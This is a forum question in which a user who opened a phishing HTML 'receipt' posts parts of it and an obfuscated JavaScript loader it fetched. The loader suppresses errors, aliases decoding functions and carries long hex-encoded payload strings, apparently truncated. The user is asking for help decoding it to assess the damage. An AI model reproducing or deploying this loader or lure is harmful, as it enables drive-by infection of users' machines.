# HTML Encoded JavaScript

Tags: javascript, html, curl, decode

I recently got the "joy" of opening an HTML file that was similar to an expected receipt such that I opened the HTML file.

To which, part of the HTML pulled down a JavaScript from a non-descript site that has subsequently removed the content. I grabbed it via cURL before it was removed.

I know the message is encoded, and I am searching for a proper decoder to learn what impacts the JavaScript has had on my system. I have tried unsuccessfully to go to and from a variety of encodings to reveal the actual code. I would be most grateful for any assistance to determine what the impact was, or even just link to decode it myself.

To intentionally avoid having anyone's else be compromised, I am not going to post the entire HTML code, rather just two parts:

```
<html xmlns="http://www.w3.org/1999/xhtml">
 <head>
  <meta content="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" name="generator"/>
  <meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
```

and then (again, it is clearly not site.site)

```
<script src="http://site.site/script.php" type="text/javascript">
```

when I cURL'ed the php above, it came back with

```
 window.onerror = function (errorMsg, url, lineNumber) {
    return true;
};
OUQ = setTimeout;
Bpbo = String.fromCharCode;
dSR = parseInt;
BbcUcwd = function (a, b) {
    return a.charAt(b);
};
var WGUNFs = '';
var EQRsXT = '6f39569db73a30c9bc4d132742876bbc72a8a51ce51fb31f2a184e746fbf8f9cf9556e7dff645a95af61440d108473d6a9af68475053fbd9937d03d90fe897e9871efa565257a9496986871b49b5f23a2bbd703edf9a97b8d27333f2b9b816e4340b59cffbcfebf8163c0941ba0cbe47eb45cbf2a4f7611e53d3ea3f34d55817f96b5464575de6831e08d4f8fb1ded7d5736f7ecb1638fac6e5b0f2721d9e0ccf703f1123f036dac68f0d773c684e80ab2db85fb2245fceba01904bc14ff20ef334f324ebdac82fe7c2991eb8cf22aac74b967fbb4ac3d2e37cf4727424e0d5564146bef776356734775b60e7191ac59eda477a30f0b8ade674f4544ea55c30ad71646408e4caddf38375695288de57d14d96a391526a5037778cac34a1fc3dfed7fe5bb5d996a39e3f091771202a9a35ecfcddfe251acd1e6627a938ea2e248cad277bc243b436eb6e505a9feb4bba9e61c64f785bd6437ed567f5af12218318decb4825a72dc74e80ec2d5c1f04a7e38c022af33d30ce4f001c78c02a52363b308a523364bd079a65ba4565000df191a63d86aa619742244e9c60fb6285954e0f3aa6589451a4813ea942098a12e114f34a5323b6b7ad46d3ff0bebb997f79ec04551b7b97a4991ff7bc2f41dd560d2922a41e37d4b5059101e92b3007d813a78065ee25b4500ff51ba3543b4d3457df04bedb3389ae199c7d51d5a5f625cedb20a2e0a6b23a66e4a162f0e6e6042fe0bebd295d39791981edac8de90a3d72b2ab4b7818d24464b4f7a74769a565fd94051c148c799a3ae9a53eefa1126a86edee9f40b5d20d8c4f76ff3c3f5422b157ad5099b00b87f392f73db91607f370040756fefb4f1bd304c7ff6d6a0b4e824d2062961e604f8535b4d7fdf0a26b3c6046613a692d9dd97c3e112ebb5937f5a127b1ca4284d0311b0480c9d26eafacae9f4d736656786404f71a14582f57cc0c7661bcbfbf7a9fb39ede127b4f2fe39c185c164d41e0f4761f1210fbcb151a8bc8e64ad93aef286640b93b1a32dcb824920715ee08ff0cdd5f29e7e3ec33f4b1bd29ee6429f02cf526a4bb10dffa041017660a595f9838b22d9256f216d30a25f8a00340385857cf92433e1c19ec1a6245556b6742c5d1680494f01806236a72723cfb2f871a2b07ec59ec76686547bb23e9093234b67b336cc927d873e5dc48b22ef85824dfccbfb10e12e055544c2301e12f086042e89834816641945f83fcec49a3ac566fb40374464733762f055ba31e3a4b3029f6b5019a2cb968b8dfa9a2e7fd4139344e21bb5078cae6b0f332bb4403abb2d150c3f2b3e4eab7d5214d99b82e37c946d7b0de44091a49b63411d51fcfea6021fcad1d569dc567b1a9e20b23eabb6b7f5940835502f0bb9d3d9945f77252c7937260cfebf2b0627cac70793ba379aae9433ae644f34251320e567abd68e8eab2cf743b9c820f2c2e5e931ea0247a0d239fbfaea57fb52a1ae79dad114c087d2fbff94244c0674e2da55ee40b6369b575497aea731548a8c610b8eee4adeb6b6c35523d06ba5215254f552552174521e311736a33077629d3b74dd51afe7aa87ba6fdb34e5624758329971422a3a4b4548d18d9060c67768c5703510446ba96b0f4bd97f887171d9f4461702d2efc3a1cb718dbcece4a3c80959de9687d4b361e7f5f2fa7b0d8c1cef05142a808aa14f400776d43c86ad1225ecae1030b65e949bff71e137fb86265454221011756ef1bc31ee4cc0b585e6f060c5f668325f174ad43e014aba067abd0133543785006179ffb6686ed3cf1c06f3b73b8d07f9291f02eb896397cb969e7baaefe8c88052041b3a5667d1b56b751150da1245b7e0911e23e8da5ec6f6107fca86aa7a80b791b1e145071218113b44f316d3fa2b988a75be27fa8d11e59cd2e2c96583d6de63ac90be7e67c99fb3d7f0444e18fed9350701e2b86be2c3dae0d9a1eafa856fc9834550c83f07f6018db95c87056edb61015b63b141274c2d062b93870e0a704623b18eb646cc245fa69a7c723d9b4bc81b0de19075a0ad3e222e0a54a1211031cf9339a2d6dd21252de085fe941f588210a196e17e15e27e9be60c0b14c38c652d07d53f77870b9abf4e7762be8faf5e61ecaabaab83bba4828ab6e0b17bc22b9dcf136ff85669ee224d156379c0cfdf287277e0cf02420f700acdbe0761949d395cb4e653b73296c1dd651ced70ff8a526c59336522e897279398eb40eed02ff3f0327d94dc6e45a48baa5c5cf39f5a864f755d5beefb90e4fefa1961f99210d9332f32d63457f802f144f0837b188cf1982d31f43f450836e1cb38a4067a21d0062d9b3f27be9f1c8893df3c5ce4a44ac5b23977574f0ed8219b5e684967a0d55dbab49ba406f97225ae34bfc5b4b2aacba77113f32f207d37aacd7d70d5fe177d06fd1fa78dd3d0abd6be5d7b733bb4313ef5e4ce964a3567a7105e8509e7bbe2319a8e2083fdaab1d376158bdfd851ab43692dc8e7cff8ab74e69285206a02556df03184db6cb173924f3a65c25ac076aa8f98da3e8959eb68349463945fb8040af6d6efa2170c17dae6358bcdec3f9abe3b34b415b3b196ee3e6291b00162e28c1ae3f6b31850b494c56d525ec3813aae8bcd9c1d42b2774d90e2ea01708f81556281e35c71d7618796bbe3528466ed046707b075c201ac5be3b48217cac874805b5eef6ca744e4e0cac08748b126fecafc9e4cded96fb35d1a7bf5b1c4dd5a4565f126ca7f3123f0ac047ac2c7aada628d3da6f0261323a40a2ac154aefb2e96e5c06174dbaf143ed29787e424ac37d7cefcf2ee488fd7eb791f230094635095700e80829a5730f1671f25027e1b327bf031e731370278fa441e679119fed2af6b6797e57aff516a568cfbdbe11adea6c746e26dbb0c1527d0f38c1706ba3637ff7d07bb3466724f2bb94abca6617c70c6ceefef8a0c3b92f7f7c6035560c6582b27703bed798587730413c1106053f7c6ce7f8488f371afeb8b61659efaf5b3718f30b7861bb657350695c14aa3fc1429cfbeb16f1080da707438cfe51f570caf6fdf5121c732731454772d69157f7ffdae742ed4d6b463dba7e4c0821aa25199e82a9ed83ec987e72bea8170c41c3a42397f100ebc946ac74d6c356c0f4a066312ec8b78a12f7d4c0c845ad070de49eb90ef47aa4ebc62f4f7b3313916c2b3fed5dccd3bd48cb00577a3827466df64b4707fd920b0b025d2cf665597abd0fcb625eb3bff6ac100a3d0165c63c1dd3eee72b2d11410cd6ae7a40b153d35435c44e358f6a42acfab66cbca85eb11297609d7bfed015c9068e094724334f944c7546f410b01f51387a1c6fdc7c671ce9cebc54a70f0d26f02f662c3a62b0ce861741ee53755970579b8cf194302ab5124bd092fd0078c0cd093100e8f92f0154e4122947636e3627073f230fc32a1a60e5a78335d88aeff748763d805562a655b4adf045ade8552ddb310c687b8fe8a7f4206777b712';
var NYUrVU = '661b7bc297614aa9df3b7c492faa11d51dd2cd7cbf70c47f48352d171fdfab9bdc7a4e5ee44926a19445663031a919b7decf5671383494b9bd156ec16d93da94b23cc9747f6b95665bb4bb8029c195130b871506bcbaaedcb70a55ccb79a3ac5162c7abb9dbfcf8e82493569d46aca6cb225c49a8fe14b3537b89f6e62b93e3fd2545e447882caa34183b58bdd74a243365c989add0be5d94338824544b2858da0689c7b547947910699aa12b0e3cd268cd2a7db0466dcd0d97c799d6b8f47d75c2e47309991a7901554accaaa8045d84fb647e0978e1e0f5bbc6d553b3a62344a66048e040b6b56770ad02c4c9f917ed2895885647da9ae173b2b24c93faa66b07e3280ac7fdea71f0d5db608b1c66039b91b1c6954dc6f1558a9b03b7babb2d35dd8cd26bb5235c6d3b5573727ccd472bec3bce224e0b7e16c5fb6b385c46abdb7089c4753311ec5d965c79fc4d7d08c6b4a93e5ca215b8a3b1a3885545b4ddd8ed4d13f21bc5ece66babaaed264270ca20fca5aa27f92b36cafe36ba32e44982c85081a32c41dd63ac2392930ba7e7226b514cc801d563aabbf5bda531c388f988649e6317a2836c3d015c7944c843d56db4b7c0e1dbd235adad4cbb6612387792b7355aeb1be40d8a11266b4387d5c53cf3f59a79114b123ca0c1428a919afa34ad208c5367dd970cf294f3d0b35c368cfc30c848e3cc0613aa3d09a56a8b5528393cac54f17bece159a89d3302ac3a09f0c821e0318a6d18faecd2a4d14c48e1f227d86675995d6c9745dc50cd2a7662b7bb441b05bdfa10d8ec62b5eb089e3b07590b969b77d469e0c5b6841dc669568add86bb1c1aad114de274091492b3f209f8a7164a2718f8807042e76a6744704a428067fb25388e49ccb985a13557453055f23ade04d0b2a4c906158cbc21f89a929e5ba017e6ab4afb25a9cd098ab2b475835424b43817d677d6f21af641805d59f875fc193a6a9740e7059e2ac646e277a2c8f875f697865e0a42c2fb3a2df64915d90794830df5a7d4ab69a18bb3d81ca25da78a01a508f85905dd79e8509c2155b9e44940dc5cb82b7bd6f71682666423fb34ad563e236bb7ba72310b0c767151b3d40b2e4034f3973c8363a23343b4b24afb31e45e3d9712f14445d6111cf06dd6e4d78a23fa91d1d4f73c7568445495ee3585007ac5a9b07d0af61995c8e3270aaa2daa36d7a84291a3b1078ca1e244e6edbb21eac5e39b574c1dee372e1a777519427596a355209146236d07e573372599ad266bd129913d9b1d2d083a62f4c56210c9e3c11be9a8cdf22e02f6ed0dfb483a1a2e2cac68ee20172bd991117c429aa92bf2c663a75995271ba71add46a02df91417ac1b508c58b8279478dc850437e1fa47a60cdb5bf1fbc65d75728a8e25212ad8ed591441ac8140c58c91adec93664802385353540375d5e9e4cc9ce92a6131cb8e07e4e4b31c075c94e1e7d4cc186909757c30a3bc7bf91366e281e45d2d43728b24b2a109a669037031bd2173a5689187d33ddb12cd5c6d484e46250192d38139b757d47707f593c72704c8f791a128061634fa5d32ca8429b2c855b89c495636c11838c0dbb3407c2cadc77b23ab1757c0250886026717b4eb1a0c895d1b993e4673da6694e0c46409d586b9b6abac0ac244da4a8a4c920182755710d7b119c94c3a3a4853664952ce16883654f674abf0ea7032db2892736499226df84787814d0511a2528457669339f24cd1990ae2e7382116b677b4baf0cd121cc34c532918149cdbd7e444a5a71801fc1df47abce1dd1e4521e5e9bb91bb3bc8650debd5a1ad70f94d291c2b1bb2f2e6495874b5f3d779874352d860d75090534c61fb085cc52462ade8b4dd6ce7e5d808361355120a382d43b14295edbdea38835890d8896802faa0a06ba435919b653a972cfd25eb5de104f2e74d6a5e2a97c47351ab9911f1e893a94418f8b78dcb914762da7d55f0478b8e0a8173b9a9a777add547e7c4ce5b707ce62148bc73b0c637a990a0fa831c24ddba659b28996ba92bc66793
```

Based on the function above, it is clear there is a url intended, but I am not sure if any other rouge JS was run.

Comment: This isn't really "HTML-encoded" by any common definition of that term, and thus this is somewhat outside the scope of StackOverflow. Reversing the script will doubtless show an attempt to exploit a vulnerability in Java & an ActiveX control; it's not clear how this information would be especially helpful.

Comment: Is there anything else at the bottom of the PHP?  It looks to be incomplete.

Comment: What looks to have happened is the rouge party compromised a server.. and posted a PHP script that would just deliver the ASCII text for the JavaScript.. So it is a combination of what was the first meta content HTML, followed on by the JavaScript. Challenge is what is decoding tool to use for each.

Comment: While I do understand the urge to get to know the hack that you have fallen for I must agree with @EricLaw for this is not really a SO kinda question.

Comment: ack'ed... any suggestions for forums / other? thx.